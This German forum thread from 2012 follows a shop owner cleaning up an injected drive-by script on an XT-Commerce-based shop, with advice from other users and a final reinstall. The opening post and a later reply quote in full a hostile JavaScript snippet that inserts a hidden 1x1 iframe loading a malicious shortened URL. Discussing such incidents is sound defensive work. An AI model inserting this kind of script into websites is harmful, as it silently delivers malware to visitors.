Neuigkeiten
  • Die modified eCommerce Shopsoftware ist kostenlos, aber nicht umsonst.
    Spenden
  • Damit wir die modified eCommerce Shopsoftware auch zukünftig kostenlos anbieten können:
    Spenden
  • Thema: Malware Befall durch Template?

    Whitechillz

    • Neu im Forum
    • Beiträge: 19
    Malware Befall durch Template?
    am: 16. Juli 2012, 23:23:59
    Liebe Community,

    ich habe es nun fast geschaft einen Online-Shop für unseren Familienbetrieb einzurichten.
    Ihr habt mir schon einigemale geholfen, da meine html / php fähigkeiten nicht berauschend sind.
    Nun habe ich mal wieder ein Problem in dem Fall "Malware"

    Unser Shop : http://tinyurl.com/cxx4n5l

    Google Webmaster bzw. Malware scanner melden !

    Zitat
    <script>var url="http://tinyurl.com/bw9tsg4";if((navigator.user
    Agent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgen
    t.toLowerCase().indexOf("firefox")>=0)){var f=document.creat
    eElement('iframe');f.setAttribute("width","1");f.setAttribut
    e("height","1");f.setAttribute("src",url);f.setAttribute("st
    yle","visibility: hidden; position: absolute; left: 0pt; top
    : 0pt;");document.getElementsByTagName("body")[0].appendChil
    d(f)}</script>
    in der index.php

    Weder ist mir bewusst was dieses script verursacht ?
    Noch wo es her kommt !
    gibt mann das Script bei google ein finde ich einige Seiten wo sich dieses Script befindet.
    Die seite http://tinyurl.com/bw9tsg4 ist als gefahr von google geblockt.
    Nun habe ich mit "Info Rapid" jede Datei nach diesem script durchsucht und in einigen html dateien entfernt. Alles Sauber. Die Index.php hat aber nichts dergleichen.
    Habe sogar viele dateien mit dem orig. pack ersetzt.

    So nun kommts ^^

    lasse ich mir im Firefox den Shop untersuchen. bzw. Quelltext anzeigen steht da xmal dieses Script !

    Zitat
    <body><?xml version="1.0" encoding="iso-8859-1"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
    <script>var url="http://tinyurl.com/bw9tsg4";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>

    <div id="usermenu">
      <div id="user">           
          <a href="http://tinyurl.com/csgcycg">Startseite</a>
          <a href="http://tinyurl.com/dyx2557">Warenkorb</a>

    Aber ich finde keinen Eintrag ? die Index ist Sauber.
    Woher kann die info denn kommen ?

    Bin echt verzweifelt !

    PS: Lokales System clean, webspace gesichert und untersucht, nichts zu finden.

    Ich hoffe Ihr habt eine Lösung, das ganze neu zu instalieren und dann die Datenbank einzuspielen wäre mehr als schwierig da ich schon zu viele dateien geändert habe, und nun den Überblick verloren habe :-(

    [EDIT Tomcraft 20.07.2012: URLs gekürzt.]

    Linkback: https://www.modified-shop.org/forum/index.php?topic=21158.0

    WayneTsun

    • Fördermitglied
    • Beiträge: 1.082
    • Geschlecht:
    Re: Malware Befall durch Template?
    Antwort #1 am: 16. Juli 2012, 23:26:59
    Hi Whitechillz,

    schau Dir mal Deine /includes/header.php an.

    Beste Grüße,
    Wayne

    shark007

    • Fördermitglied
    • Beiträge: 40
    • Geschlecht:
    Re: Malware Befall durch Template?
    Antwort #2 am: 17. Juli 2012, 00:05:10
    Hello Withechillz

    Hast du eine aktuelle Datensicherung der Files?
    Dann könntest du alles neu hochladen - ich denke die Datenbank sollte okey sein

    gruss shark007

    Whitechillz

    • Neu im Forum
    • Beiträge: 19
    Re: Malware Befall durch Template?
    Antwort #3 am: 17. Juli 2012, 00:40:20
    hmm,

    die Header php beinhaltet nichts von dem sogenannten Script
    also ich suche immer mit editor oder such tool nach dem wort http://tinyurl.com/bw9tsg4 bzw script var =

    Code: PHP  [Auswählen]
    <?php
    /* -----------------------------------------------------------------------------------------
       $Id: header.php 1140 2005-08-10 10:16:00Z mz $  

       XT-Commerce - community made shopping
       http://www.(( Wir dulden keine kommerziellen Werbelinks - Bitte Forenregeln beachten! ))

       Copyright (c) 2003 XT-Commerce
       -----------------------------------------------------------------------------------------
       based on:
       (c) 2000-2001 The Exchange Project  (earlier name of osCommerce)
       (c) 2002-2003 osCommerce(header.php,v 1.40 2003/03/14); www.oscommerce.com
       (c) 2003      nextcommerce (header.php,v 1.13 2003/08/17); www.nextcommerce.org

       Released under the GNU General Public License
       -----------------------------------------------------------------------------------------
       Third Party contribution:

       Credit Class/Gift Vouchers/Discount Coupons (Version 5.10)
       http://www.oscommerce.com/community/contributions,282
       Copyright (c) Strider | Strider@oscworks.com
       Copyright (c  Nick Stanko of UkiDev.com, nick@ukidev.com
       Copyright (c) Andre ambidex@gmx.net
       Copyright (c) 2001,2002 Ian C Wilson http://www.phesis.org


       Released under the GNU General Public License
       ---------------------------------------------------------------------------------------*/



    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" <?php echo HTML_PARAMS; ?>>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=<?php echo $_SESSION['language_charset']; ?>" />
    <meta http-equiv="Content-Style-Type" content="text/css" />
    <?php include(DIR_WS_MODULES.FILENAME_METATAGS); //FIX cache problems with Firefox 12 ?>
    <link rel="shortcut icon" href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER).DIR_WS_CATALOG.'templates/'.CURRENT_TEMPLATE.'/favicon.ico';?>" type="image/x-icon" />

    <?php
    /*
      The following copyright announcement is in compliance
      to section 2c of the GNU General Public License, and
      thus can not be removed, or can only be modified
      appropriately.

      Please leave this comment intact together with the
      following copyright announcement.

    */

    ?>
    <!--
            This OnlineStore is brought to you by XT-Commerce, Community made shopping
            XTC is a free open source e-Commerce System
            created by Mario Zanier & Guido Winger and licensed under GNU/GPL.
            Information and contribution at http://www.(( Wir dulden keine kommerziellen Werbelinks - Bitte Forenregeln beachten! ))
    -->
    <meta name="generator" content="(c) by <?php echo PROJECT_VERSION; ?> -----|---- http://www.modified eCommerce Shopsoftware.org-" />
    <base href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>" />
    <?php
    /*
    //BOF - DokuMan - 2010-03-16 - Enhance page loading time by putting CSS on TOP of page and JavaScript on BOTTOM of page
    //<link rel="stylesheet" type="text/css" href="<?php echo 'templates/'.CURRENT_TEMPLATE.'/stylesheet.css'; ?>" />
    */

    if (file_exists('templates/'.CURRENT_TEMPLATE.'/css/general.css.php')) {
      require('templates/'.CURRENT_TEMPLATE.'/css/general.css.php');
      }
      //Maintain backwards compatibility for older templates
      else {
        echo '<link rel="stylesheet" type="text/css" href="templates/'.CURRENT_TEMPLATE.'/stylesheet.css" />';
    }
    //EOF - DokuMan - 2010-03-16 - Enhance page loading time by putting CSS on TOP of page and JavaScript on BOTTOM of page
    ?>

    <script type="text/javascript"><!--
    var selected;
    var submitter = null;

    function submitFunction() {
        submitter = 1;
    }
    function popupWindow(url) {
      window.open(url,'popupWindow','toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,resizable=yes,copyhistory=no,width=100,height=100,screenX=150,screenY=150,top=150,left=150')
    }  

    function selectRowEffect(object, buttonSelect) {
      if (!selected) {
        if (document.getElementById) {
          selected = document.getElementById('defaultSelected');
        } else {
          selected = document.all['defaultSelected'];
        }
      }

      if (selected) selected.className = 'moduleRow';
      object.className = 'moduleRowSelected';
      selected = object;

    // one button is not an array
      if (document.getElementById('payment'[0])) {
        document.getElementById('payment'[buttonSelect]).checked=true;
      } else {
        //document.getElementById('payment'[selected]).checked=true;
      }
    }

    function rowOverEffect(object) {
      if (object.className == 'moduleRow') object.className = 'moduleRowOver';
    }

    function rowOutEffect(object) {
      if (object.className == 'moduleRowOver') object.className = 'moduleRow';
    }

    function popupImageWindow(url) {
      window.open(url,'popupImageWindow','toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=yes,copyhistory=no,width=100,height=100,screenX=150,screenY=150,top=150,left=150')
    }
    //--></script>
    <?php
    // require theme based javascript
    //BOF - DokuMan - 2010-02-25 - Enhance page loading time by putting CSS on TOP of page and JavaScript on BOTTOM of page
    //BOF - web28 - 2010-07-14 - change to TOP of page again because jquery view problems
    require('templates/'.CURRENT_TEMPLATE.'/javascript/general.js.php');
    //EOF - web28 - 2010-07-14 - change to TOP of page again because jquery view problems
    //EOF - DokuMan - 2010-02-25 - Enhance page loading time by putting CSS on TOP of page and JavaScript on BOTTOM of page

    if (strstr($PHP_SELF, FILENAME_CHECKOUT_PAYMENT)) {
     echo $payment_modules->javascript_validation();
    }

    if (strstr($PHP_SELF, FILENAME_CREATE_ACCOUNT)) {
    require('includes/form_check.js.php');
    }


    if (strstr($PHP_SELF, FILENAME_CREATE_GUEST_ACCOUNT )) {
    require('includes/form_check.js.php');
    }
    if (strstr($PHP_SELF, FILENAME_ACCOUNT_PASSWORD )) {
    require('includes/form_check.js.php');
    }
    if (strstr($PHP_SELF, FILENAME_ACCOUNT_EDIT )) {
    require('includes/form_check.js.php');
    }
    if (strstr($PHP_SELF, FILENAME_ADDRESS_BOOK_PROCESS )) {
      if (isset($_GET['delete']) == false) {
        include('includes/form_check.js.php');
      }
      }
    if (strstr($PHP_SELF, FILENAME_CHECKOUT_SHIPPING_ADDRESS )or strstr($PHP_SELF,FILENAME_CHECKOUT_PAYMENT_ADDRESS)) {
    require('includes/form_check.js.php');
    ?>
    <script type="text/javascript"><!--
    function check_form_optional(form_name) {
      var form = form_name;

      var firstname = form.elements['firstname'].value;
      var lastname = form.elements['lastname'].value;
      var street_address = form.elements['street_address'].value;

      if (firstname == '' && lastname == '' && street_address == '') {
        return true;
      } else {
        return check_form(form_name);
      }
    }
    //--></script>
    <?php
    }

    if (strstr($PHP_SELF, FILENAME_ADVANCED_SEARCH )) {
    ?>
    <script type="text/javascript" src="includes/general.js"></script>
    <script type="text/javascript"><!--
    function check_form() {
      var error_message = unescape("<?php echo xtc_js_lang(JS_ERROR); ?>");
      var error_found = false;
      var error_field;
      var keywords = document.getElementById("advanced_search").keywords.value;
      var pfrom = document.getElementById("advanced_search").pfrom.value;
      var pto = document.getElementById("advanced_search").pto.value;
      var pfrom_float;
      var pto_float;

      if ( (keywords == '' || keywords.length < 1) && (pfrom == '' || pfrom.length < 1) && (pto == '' || pto.length < 1) ) {
        error_message = error_message + unescape("<?php echo xtc_js_lang(JS_AT_LEAST_ONE_INPUT); ?>");
        error_field = document.getElementById("advanced_search").keywords;
        error_found = true;
      }

      if (pfrom.length > 0) {
        pfrom_float = parseFloat(pfrom);
        if (isNaN(pfrom_float)) {
          error_message = error_message + unescape("<?php echo xtc_js_lang(JS_PRICE_FROM_MUST_BE_NUM); ?>");
          error_field = document.getElementById("advanced_search").pfrom;
          error_found = true;
        }
      } else {
        pfrom_float = 0;
      }

      if (pto.length > 0) {
        pto_float = parseFloat(pto);
        if (isNaN(pto_float)) {
          error_message = error_message + unescape("<?php echo xtc_js_lang(JS_PRICE_TO_MUST_BE_NUM); ?>");
          error_field = document.getElementById("advanced_search").pto;
          error_found = true;
        }
      } else {
        pto_float = 0;
      }

      if ( (pfrom.length > 0) && (pto.length > 0) ) {
        if ( (!isNaN(pfrom_float)) && (!isNaN(pto_float)) && (pto_float < pfrom_float) ) {
          error_message = error_message + unescape("<?php echo xtc_js_lang(JS_PRICE_TO_LESS_THAN_PRICE_FROM); ?>");
          error_field = document.getElementById("advanced_search").pto;
          error_found = true;
        }
      }

      if (error_found == true) {
        alert(error_message);
        error_field.focus();
        return false;
      }
    }

    function popupWindow(url) {
      window.open(url,'popupWindow','toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,resizable=yes,copyhistory=no,width=450,height=280,screenX=150,screenY=150,top=150,left=150')
    }
    //--></script>
    <?php
    }

    if (strstr($PHP_SELF, FILENAME_PRODUCT_REVIEWS_WRITE )) {
    ?>

    <script type="text/javascript"><!--
    function checkForm() {
      var error = 0;
      var error_message = unescape("<?php echo xtc_js_lang(JS_ERROR); ?>");

      var review = document.getElementById("product_reviews_write").review.value;

      if (review.length < <?php echo REVIEW_TEXT_MIN_LENGTH; ?>) {
        error_message = error_message + unescape("<?php echo xtc_js_lang(JS_REVIEW_TEXT); ?>");
        error = 1;
      }

      if (!((document.getElementById("product_reviews_write").rating[0].checked) || (document.getElementById("product_reviews_write").rating[1].checked) || (document.getElementById("product_reviews_write").rating[2].checked) || (document.getElementById("product_reviews_write").rating[3].checked) || (document.getElementById("product_reviews_write").rating[4].checked))) {
        error_message = error_message + unescape("<?php echo xtc_js_lang(JS_REVIEW_RATING); ?>");
        error = 1;
      }

      if (error == 1) {
        alert(error_message);
        return false;
      } else {
        return true;
      }
    }
    //--></script>
    <?php
    }
    if (strstr($PHP_SELF, FILENAME_POPUP_IMAGE )) {
    ?>

    <script type="text/javascript"><!--
    var i=0;
    function resize() {
      if (navigator.appName == 'Netscape') i=40;
      if (document.images[0]) window.resizeTo(document.images[0].width +30, document.images[0].height+60-i);
      self.focus();
    }
    //--></script>
    <?php
    }

    ?>
    </head>
    <?php
    if (strstr($PHP_SELF, FILENAME_POPUP_IMAGE )) {
    echo '<body onload="resize();"> ';
    } else {
    echo '<body>';
    }

    // econda tracking
    if (TRACKING_ECONDA_ACTIVE=='true') {  
    ?>
    <script type="text/javascript">
    <!--
    var emos_kdnr='<?php echo TRACKING_ECONDA_ID; ?>';
    //-->
    </script>
    <a name="emos_sid" rel="<?php echo session_id(); ?>" rev=""></a>
    <a name="emos_name" title="siteid" rel="<?php echo $_SESSION['languages_id']; ?>" rev=""></a>
    <?php  
    //      require_once(DIR_WS_INCLUDES . 'econda/econda.php');
    }


    if (strstr($PHP_SELF, FILENAME_CHECKOUT_SUCCESS) && GOOGLE_CONVERSION == 'true') {
    require('includes/google_conversiontracking.js.php');
    }


      // include needed functions
      require_once('inc/xtc_output_warning.inc.php');
      require_once('inc/xtc_image.inc.php');
      require_once('inc/xtc_parse_input_field_data.inc.php');
      require_once('inc/xtc_draw_separator.inc.php');

    //  require_once('inc/xtc_draw_form.inc.php');
    //  require_once('inc/xtc_draw_pull_down_menu.inc.php');

      // check if the 'install' directory exists, and warn of its existence
      if (WARN_INSTALL_EXISTENCE == 'true') {
        if (file_exists(dirname($_SERVER['SCRIPT_FILENAME']) . '/xtc_installer')) {
          xtc_output_warning(WARNING_INSTALL_DIRECTORY_EXISTS);
        }
      }

      // check if the configure.php file is writeable
      if (WARN_CONFIG_WRITEABLE == 'true') {
        if ( (file_exists(dirname($_SERVER['SCRIPT_FILENAME']) . '/includes/configure.php')) && (is_writeable(dirname($_SERVER['SCRIPT_FILENAME']) . '/includes/configure.php')) ) {
          xtc_output_warning(WARNING_CONFIG_FILE_WRITEABLE);
        }
      }

      // check if the session folder is writeable
      if (WARN_SESSION_DIRECTORY_NOT_WRITEABLE == 'true') {
        if (STORE_SESSIONS == '') {
          if (!is_dir(xtc_session_save_path())) {
            xtc_output_warning(WARNING_SESSION_DIRECTORY_NON_EXISTENT);
          } elseif (!is_writeable(xtc_session_save_path())) {
            xtc_output_warning(WARNING_SESSION_DIRECTORY_NOT_WRITEABLE);
          }
        }
      }

      // check session.auto_start is disabled
      if ( (function_exists('ini_get')) && (WARN_SESSION_AUTO_START == 'true') ) {
        if (ini_get('session.auto_start') == '1') {
          xtc_output_warning(WARNING_SESSION_AUTO_START);
        }
      }

      if ( (WARN_DOWNLOAD_DIRECTORY_NOT_READABLE == 'true') && (DOWNLOAD_ENABLED == 'true') ) {
        if (!is_dir(DIR_FS_DOWNLOAD)) {
          xtc_output_warning(WARNING_DOWNLOAD_DIRECTORY_NON_EXISTENT);
        }
      }


    $smarty->assign('navtrail',$breadcrumb->trail(' &raquo; '));
    // BOF - Hetfield - 2009-12-17 - added new links index and login for index.html
    if (isset($_SESSION['customer_id'])) {
            $smarty->assign('logoff',xtc_href_link(FILENAME_LOGOFF, '', 'SSL'));
    } else {
            $smarty->assign('login',xtc_href_link(FILENAME_LOGIN, '', 'SSL'));
    }
    $smarty->assign('index',xtc_href_link(FILENAME_DEFAULT));
    // EOF - Hetfield - 2009-12-17 - added new links index and login for index.html
    if ( $_SESSION['account_type']=='0') {
    $smarty->assign('account',xtc_href_link(FILENAME_ACCOUNT, '', 'SSL'));
    }
    $smarty->assign('cart',xtc_href_link(FILENAME_SHOPPING_CART, '', 'NONSSL')); // web28 - 2010-09-20 - change SSL -> NONSSL
    $smarty->assign('checkout',xtc_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL'));

    // BOF - Dokuman - 2009-05-27 - added htmlspecialchars
    //$smarty->assign('store_name',TITLE);
    $smarty->assign('store_name', htmlspecialchars(TITLE));
    // EOF - Dokuman - 2009-05-27 - added htmlspecialchars

    if (isset($_GET['error_message']) && xtc_not_null($_GET['error_message'])) {
            $smarty->assign('error','<p class="errormessage">'. htmlspecialchars(urldecode($_GET['error_message'])).'</p>');
    }
    if (isset($_GET['info_message']) && xtc_not_null($_GET['info_message'])) {
            $smarty->assign('error','<p class="errormessage">'.htmlspecialchars($_GET['info_message']).'</p>');
    }

    include(DIR_WS_INCLUDES.FILENAME_BANNER);
    //BOF - web28- 2010-07-07 SHOP OFFLINE INFO
    require_once(DIR_FS_INC . 'xtc_get_shop_conf.inc.php');
    if(xtc_get_shop_conf('SHOP_OFFLINE') != 'checked' || $_SESSION['customers_status']['customers_status_id'] == 0) {      
            //Do nothing
    } else {    
            $smarty->assign('language', $_SESSION['language']);
            $smarty->assign('shop_offline_msg', xtc_get_shop_conf('SHOP_OFFLINE_MSG'));    
        $smarty->display(CURRENT_TEMPLATE.'/offline.html');
            EXIT;
    }
    //EOF  - web28- 2010-07-07 SHOP OFFLINE INFO
    ?>

    @ shark
    das wird wohl die einzige Lösung sein, leider weis ich nicht ob meine Save befallen ist :-(

    Wenn keine Datei ob html oder php nicht mal der code eines Bildes, eine form des scripts (http://tinyurl.com/bw9tsg4) beinhaltet, voher dann der müll im Quelltext ?
    Ist einfach ***** vlt, sitz ich aber auch schon zu viele Stunden vorm Rechner.

    Aber Danke für die Antworten, vlt fällt mir ja noch eine Lösung ein, werde Morgen mal die Save ersetzen und schauen ob es eine Besserung gibt, suche das unsichtbare :-)

    Grüße White

    [EDIT Tomcraft 20.07.2012: URLs gekürzt.]

    blade

    • Mitglied
    • Beiträge: 164
    Re: Malware Befall durch Template?
    Antwort #4 am: 17. Juli 2012, 02:01:23
    Hi,

    lade den gesamten Shop auf dein PC herunter in einen separaten Ordner. Wenn dieser Script sich in einer Datei befinden sollte, wird der Virenscanner sicherlich eine Meldung rausgeben.

    Es kann viele Ursachen haben aber du musst ja irgendwo anfangen.

    blade

    • Mitglied
    • Beiträge: 164
    Re: Malware Befall durch Template?
    Antwort #5 am: 17. Juli 2012, 02:08:51
    Kann es sein, dass dieser Code von PIWIK stammt? Sieht nach Auswertung aus.

    Jenser

    • Frisch an Board
    • Beiträge: 60
    • Geschlecht:
    Re: Malware Befall durch Template?
    Antwort #6 am: 17. Juli 2012, 11:17:32
    Das Script baut ein unsichtbaren Frame in deine Seite ein, der diese gefährliche Seite unsichtbar im Hintergrund öffnet.
    Von der wird dann Schadsoftware an deine Kunden übertragen.

    hennes

    • Neu im Forum
    • Beiträge: 1
    Re: Malware Befall durch Template?
    Antwort #7 am: 19. Juli 2012, 17:01:03
    Code: Javascript  [Auswählen]
    <script>var url="http://tinyurl.com/bw9tsg4";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>

    ...dieser Teil muss raus, dann ist wohl wieder alles klar!

    Grüße

    [EDIT Tomcraft 20.07.2012: URLs gekürzt.]

    Whitechillz

    • Neu im Forum
    • Beiträge: 19
    Re: Malware Befall durch Template?
    Antwort #8 am: 19. Juli 2012, 21:39:14
    So nach langen suchen hat sich alles gelöst.
    Das Script hat sich so nicht finden lassen, sondern wurde erst beim aufruf der index php zusammengesetzt und das noch ka wie das heißt im md5 code .

    Hab alles gelöscht und mit der Reperatur Anleitung im Forum neuinstaliert !
    Seitdem alles rogger.

    Fazit an alle !

    FTP pass sollte gaaaaaanz lang sein xD
    immer schön Malware / Virenscanner laufen lassen !

    Ich danke alles für die Hilfe !

    @Admin bitte post löschen !

    Whitechillz

    • Neu im Forum
    • Beiträge: 19
    Re: Malware Befall durch Template?
    Antwort #9 am: 19. Juli 2012, 21:44:38
    @ Admin

    bitte Thread löschen !
    Da in google bei der Suche nach dem Shop ganz groß kommt "Malwarebefall" .................
    Ka warum Google die XTC Modified Threads so schnell einliest, aber finde ich in manchen fällen nicht gerade Kundenfreundlich.
    Mir ist natürlich klar das niemand einfluss darauf hat.

    Ich bedanke mich ganz herzlich an den Usern und Admins.

    Euer White
    13 Antworten
    5890 Aufrufe
    19. November 2012, 16:44:25 von larsos
    5 Antworten
    2560 Aufrufe
    26. Oktober 2017, 06:46:07 von hbauer
    2 Antworten
    2015 Aufrufe
    28. Dezember 2012, 13:44:01 von Jendrik
    4 Antworten
    2707 Aufrufe
    05. Mai 2010, 17:58:52 von Halli